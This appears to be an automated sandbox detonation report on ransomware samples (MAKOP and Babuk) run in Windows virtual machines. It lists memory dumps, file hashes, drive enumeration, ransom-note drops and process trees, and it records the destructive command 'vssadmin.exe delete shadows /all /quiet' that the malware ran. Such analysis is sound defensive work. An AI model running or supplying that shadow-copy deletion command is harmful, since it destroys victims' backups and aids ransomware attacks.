memory/3688-22309-0x000001563BCB0000-0x000001563BCD0000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn\desktop.ini

MD5 e0fd7e6b4853592ac9ac73df9d83783f
SHA1 2834e77dfa1269ddad948b87d88887e84179594a
SHA256 feea416e5e5c8aa81416b81fb25132d1c18b010b02663a253338dbdfb066e122
SHA512 289de77ffbe328388ad080129b7460712985d42076e78a3a545124881c30f564c5ef8fb4024d98903d88a6a187c60431a600f6ecbbe2888ee69e40a67ce77b55

memory/3688-22292-0x000001563AD00000-0x000001563AE00000-memory.dmp

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\TempState\CortanaUnifiedTileModelCache.dat

MD5 14e6a23a73c1daf677d9380cc5ab0ff6
SHA1 71360d640b94d01a4c11848620cd5edef7354b83
SHA256 cc2f94a6e4190c944389d2bc3e6c1a72e1a6a3c06b37347b27546dd3f44e3d00
SHA512 04e415011fc5f76cc2249e45154d6807baf687cd4063edb9bf8f2cdf342c66492e0630d41e0bc8583664b08e4d017bf3a19eeb378e49d75ce9b2a1098550ec41

memory/3688-22332-0x000001563BC70000-0x000001563BC90000-memory.dmp

memory/3688-22346-0x000001563C420000-0x000001563C440000-memory.dmp

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\XNP9L40F\microsoft.windows[1].xml

MD5 a7237b6af01e07ac7d6ab6e6cdc2d0d3
SHA1 717b37a5b71c978fbd8dcae6a001c1240ded3ecf
SHA256 2f1bea9130376d79550c47fa39423f14c1f8bed1ecd5cf7786c0728c25c40828
SHA512 5513cda40fbfc32a7676fad05f7c115882de0857a379f5ab48bc60e0790ffc520222896f7e3732b71bd82b0c4355a51764c99145500be0c04c24f31c1f232810

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133648350685966153.txt

MD5 ecaea544af9da1114077b951d8cb520d
SHA1 5820b2d71e7b2543cf1804eb91716c4e9f732fde
SHA256 9117b26ab2c8fdbb8223fe1f2d1770c50a6cf0d9849a5849d6aebcbe90435be6
SHA512 dc7bedbc581818011aa2d313429f234b12e5e9cf320b02b8d7ceeaf9cdc1c921ffc51af7f4080b02740f2d2146fbb006ccbf37cdcba3e3a10009142daffdb919

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\TempState\CortanaUnifiedTileModelCache.dat

MD5 15ca64d1fbbd741533ee7ed0547a167e
SHA1 be93f638368c73fb1cd3c48ec0386bf1b526e4c8
SHA256 26bff0d8a321a62197c34e0ccf63b5b673559245fb18982afacc4f72def7abb9
SHA512 78a276b9ebb5a81324d9402a859fcd6cfe02f04211da729b88a8fa79d3a968c0e75e48bcd16e8691b5ad57718fa161a12c992227978abb2c4471b141679e6b47

memory/3712-22477-0x0000000002780000-0x0000000002781000-memory.dmp

F:\$RECYCLE.BIN\S-1-5-21-3642458265-1901903390-453309326-1000\desktop.ini

MD5 a526b9e7c716b3489d8cc062fbce4005
SHA1 2df502a944ff721241be20a9e449d2acd07e0312
SHA256 e1b9ce9b57957b1a0607a72a057d6b7a9b34ea60f3f8aa8f38a3af979bd23066
SHA512 d83d4c656c96c3d1809ad06ce78fa09a77781461c99109e4b81d1a186fc533a7e72d65a4cb7edf689eeccda8f687a13d3276f1111a1e72f7c3cd92a49bce0f88

memory/3944-22481-0x0000029248D00000-0x0000029248E00000-memory.dmp

memory/3944-22482-0x0000029248D00000-0x0000029248E00000-memory.dmp

memory/3944-22487-0x0000029249D20000-0x0000029249D40000-memory.dmp

memory/3944-22506-0x000002924A0F0000-0x000002924A110000-memory.dmp

memory/3944-22491-0x00000292499E0000-0x0000029249A00000-memory.dmp

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\TokenBroker\Cache\fbaf94e759052658216786bfbabcdced1b67a5c2.tbres

MD5 1033bd83533c62faec9fd85f4877e447
SHA1 7fa5e4e4eeb7ab7ab1ef0a77e4e1cfdce234fd86
SHA256 5eac1a6ad953fe54affc7b086058aa71d6e340a583b9f01325433b31b50cf63f
SHA512 1ca348d9b08838d5ca5fd404188a44140c7181fefcd714adae41bc8296bac55c519bc92b37b1af175f513900964c3bbae7586b178848691ba17c0c4e6f141ba2

memory/1624-22625-0x0000000004E00000-0x0000000004E01000-memory.dmp

memory/2380-22627-0x0000027C75500000-0x0000027C75600000-memory.dmp

memory/2380-22629-0x0000027C75500000-0x0000027C75600000-memory.dmp

memory/2380-22632-0x0000027C764B0000-0x0000027C764D0000-memory.dmp

memory/2380-22649-0x0000027C76470000-0x0000027C76490000-memory.dmp

memory/2380-22664-0x0000027C76880000-0x0000027C768A0000-memory.dmp

memory/2508-22773-0x0000000004A20000-0x0000000004A21000-memory.dmp

memory/4200-22777-0x0000025275000000-0x0000025275100000-memory.dmp

memory/4200-22776-0x0000025275000000-0x0000025275100000-memory.dmp

memory/4200-22781-0x0000025275FD0000-0x0000025275FF0000-memory.dmp

memory/4200-22791-0x0000025275F90000-0x0000025275FB0000-memory.dmp

memory/4200-22794-0x00000252763A0000-0x00000252763C0000-memory.dmp

memory/3640-22908-0x0000000004520000-0x0000000004521000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\{6ACD7EAB-A077-4062-B626-CBB2C4C42BD8}.png

MD5 00e5fcfd833151f7cbde607e2f7afeb4
SHA1 55839875c0947aafebff53d22ccc5dad29fe3563
SHA256 b80192aaabe007baecd0603e3ce183e9d554b8a6b0411d20716acfa086ae3035
SHA512 f056777a1987c3becdc217bdc2d82e6aa41086d38fddaa45c42f1726b6f7b7616a10918081650e825a724464ef148b669bc258d38a62e0de8642e2607a0b0de7

memory/4636-22916-0x00000116AEE20000-0x00000116AEE40000-memory.dmp

memory/4636-22929-0x00000116AEBE0000-0x00000116AEC00000-memory.dmp

memory/4636-22942-0x00000116AF1F0000-0x00000116AF210000-memory.dmp

memory/3036-23057-0x0000000002990000-0x0000000002991000-memory.dmp

memory/3656-23060-0x000001F91FF00000-0x000001F920000000-memory.dmp

memory/3656-23061-0x000001F91FF00000-0x000001F920000000-memory.dmp

memory/3656-23065-0x000001F920E90000-0x000001F920EB0000-memory.dmp

memory/3656-23088-0x000001F921260000-0x000001F921280000-memory.dmp

memory/3656-23074-0x000001F920E50000-0x000001F920E70000-memory.dmp

memory/652-23205-0x0000000004650000-0x0000000004651000-memory.dmp

memory/1096-23209-0x0000024BDB820000-0x0000024BDB920000-memory.dmp

memory/1096-23210-0x0000024BDB820000-0x0000024BDB920000-memory.dmp

memory/1096-23213-0x0000024BDC830000-0x0000024BDC850000-memory.dmp

memory/1096-23208-0x0000024BDB820000-0x0000024BDB920000-memory.dmp

memory/1096-23230-0x0000024BDC7F0000-0x0000024BDC810000-memory.dmp

memory/1096-23233-0x0000024BDCC00000-0x0000024BDCC20000-memory.dmp

memory/2956-23348-0x0000000004CA0000-0x0000000004CA1000-memory.dmp

memory/3532-23349-0x000002C843900000-0x000002C843A00000-memory.dmp

memory/3532-23351-0x000002C843900000-0x000002C843A00000-memory.dmp

memory/3532-23350-0x000002C843900000-0x000002C843A00000-memory.dmp

memory/3532-23355-0x000002D0458D0000-0x000002D0458F0000-memory.dmp

memory/3532-23381-0x000002D045CA0000-0x000002D045CC0000-memory.dmp

memory/3532-23380-0x000002D045890000-0x000002D0458B0000-memory.dmp

memory/4800-23493-0x00000000043D0000-0x00000000043D1000-memory.dmp

memory/4456-23502-0x00000217617C0000-0x00000217617E0000-memory.dmp

memory/4456-23515-0x0000021761780000-0x00000217617A0000-memory.dmp

memory/4456-23524-0x0000021761D90000-0x0000021761DB0000-memory.dmp

memory/1512-23641-0x0000000004440000-0x0000000004441000-memory.dmp

memory/3304-23645-0x00000162ABE00000-0x00000162ABF00000-memory.dmp

memory/3304-23646-0x00000162ABE00000-0x00000162ABF00000-memory.dmp

memory/3304-23671-0x00000162AD180000-0x00000162AD1A0000-memory.dmp

memory/3304-23660-0x00000162ACB70000-0x00000162ACB90000-memory.dmp

memory/3304-23649-0x00000162ACBB0000-0x00000162ACBD0000-memory.dmp

memory/3304-23644-0x00000162ABE00000-0x00000162ABF00000-memory.dmp

memory/3596-23783-0x0000000004560000-0x0000000004561000-memory.dmp

Analysis: behavioral32

Detonation Overview

Submitted

2024-07-07 14:07

Reported

2024-07-07 16:14

Platform

win10v2004-20240704-en

Max time kernel

1660s

Max time network

1157s

Command Line

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe"

Signatures

Processes

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe"

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\MAKOP_27_10_2020_115KB.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 3820 -ip 3820

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3820 -s 948

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 8.8.8.8:53 4.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp
US 13.107.21.237:443 g.bing.com tcp
US 8.8.8.8:53 237.21.107.13.in-addr.arpa udp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 107.211.222.173.in-addr.arpa udp
US 8.8.8.8:53 26.73.42.20.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\nsvACBC.tmp\System.dll

MD5 fccff8cb7a1067e23fd2e2b63971a8e1
SHA1 30e2a9e137c1223a78a0f7b0bf96a1c361976d91
SHA256 6fcea34c8666b06368379c6c402b5321202c11b00889401c743fb96c516c679e
SHA512 f4335e84e6f8d70e462a22f1c93d2998673a7616c868177cac3e8784a3be1d7d0bb96f2583fa0ed82f4f2b6b8f5d9b33521c279a42e055d80a94b4f3f1791e0c

Analysis: behavioral5

Detonation Overview

Submitted

2024-07-07 14:07

Reported

2024-07-07 14:38

Platform

win7-20240704-en

Max time kernel

1559s

Max time network

1569s

Command Line

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe"

Signatures

Babuk Locker

ransomware babuk

Deletes shadow copies

ransomware defense_evasion impact execution

Renames multiple (450) files with added filename extension

ransomware

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\E: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
File opened (read-only) \??\O: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
File opened (read-only) \??\K: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
File opened (read-only) \??\Z: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
File opened (read-only) \??\V: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
File opened (read-only) \??\W: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
File opened (read-only) \??\R: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
File opened (read-only) \??\T: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
File opened (read-only) \??\Y: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
File opened (read-only) \??\U: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
File opened (read-only) \??\P: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
File opened (read-only) \??\S: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
File opened (read-only) \??\J: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
File opened (read-only) \??\Q: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
File opened (read-only) \??\M: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
File opened (read-only) \??\B: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
File opened (read-only) \??\A: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
File opened (read-only) \??\H: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
File opened (read-only) \??\N: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
File opened (read-only) \??\I: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
File opened (read-only) \??\L: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
File opened (read-only) \??\X: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
File opened (read-only) \??\G: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A

Enumerates physical storage devices

Interacts with shadow copies

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2960 wrote to memory of 2408 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe C:\Windows\System32\cmd.exe
PID 2960 wrote to memory of 2408 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe C:\Windows\System32\cmd.exe
PID 2960 wrote to memory of 2408 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe C:\Windows\System32\cmd.exe
PID 2960 wrote to memory of 2408 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe C:\Windows\System32\cmd.exe
PID 2408 wrote to memory of 2428 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 2408 wrote to memory of 2428 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 2408 wrote to memory of 2428 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 2960 wrote to memory of 2176 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe C:\Windows\System32\cmd.exe
PID 2960 wrote to memory of 2176 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe C:\Windows\System32\cmd.exe
PID 2960 wrote to memory of 2176 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe C:\Windows\System32\cmd.exe
PID 2960 wrote to memory of 2176 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe C:\Windows\System32\cmd.exe
PID 2176 wrote to memory of 2640 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 2176 wrote to memory of 2640 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 2176 wrote to memory of 2640 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\vssadmin.exe

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c vssadmin.exe delete shadows /all /quiet

C:\Windows\system32\vssadmin.exe

vssadmin.exe delete shadows /all /quiet

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c vssadmin.exe delete shadows /all /quiet

C:\Windows\system32\vssadmin.exe

vssadmin.exe delete shadows /all /quiet

Network

N/A

Files

\Device\HarddiskVolume1\Boot\cs-CZ\How To Restore Your Files.txt

MD5 b6e97028103bc6b18214f4b2bd0e0d23
SHA1 4c202c77782d55af635c28fa71b2ba58b294415e
SHA256 db1c8cafdedfc4be8dd6b81aa086b998ae49ad929b8a260d4030c7b5ca373a45
SHA512 214f7e9354a76f031bc3d28c6c20b3d5fafed32e5cb2d7414b7c2d185637d2f47e3538b62c722ba8b018cb3e6e3d9ff11bd6437d3f2af8eca9cd8504eb8c0f7d

Analysis: behavioral6

Detonation Overview

Submitted

2024-07-07 14:07

Reported

2024-07-07 14:38

Platform

win10v2004-20240704-en

Max time kernel

1584s

Max time network

1570s

Command Line

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe"

Signatures

Babuk Locker

ransomware babuk

Deletes shadow copies

ransomware defense_evasion impact execution

Renames multiple (1641) files with added filename extension

ransomware

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-771719357-2485960699-3367710044-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\How To Restore Your Files.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A

Reads user/profile data of web browsers

spyware stealer

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\R: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
File opened (read-only) \??\U: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
File opened (read-only) \??\B: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
File opened (read-only) \??\N: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
File opened (read-only) \??\K: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
File opened (read-only) \??\X: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
File opened (read-only) \??\V: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
File opened (read-only) \??\E: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
File opened (read-only) \??\I: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
File opened (read-only) \??\O: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
File opened (read-only) \??\A: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
File opened (read-only) \??\G: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
File opened (read-only) \??\Y: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
File opened (read-only) \??\M: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
File opened (read-only) \??\H: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
File opened (read-only) \??\J: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
File opened (read-only) \??\L: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
File opened (read-only) \??\Q: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
File opened (read-only) \??\W: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
File opened (read-only) \??\T: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
File opened (read-only) \??\P: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
File opened (read-only) \??\S: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
File opened (read-only) \??\Z: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A

Enumerates physical storage devices

Interacts with shadow copies

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-771719357-2485960699-3367710044-1000_Classes\Local Settings\MuiCache C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
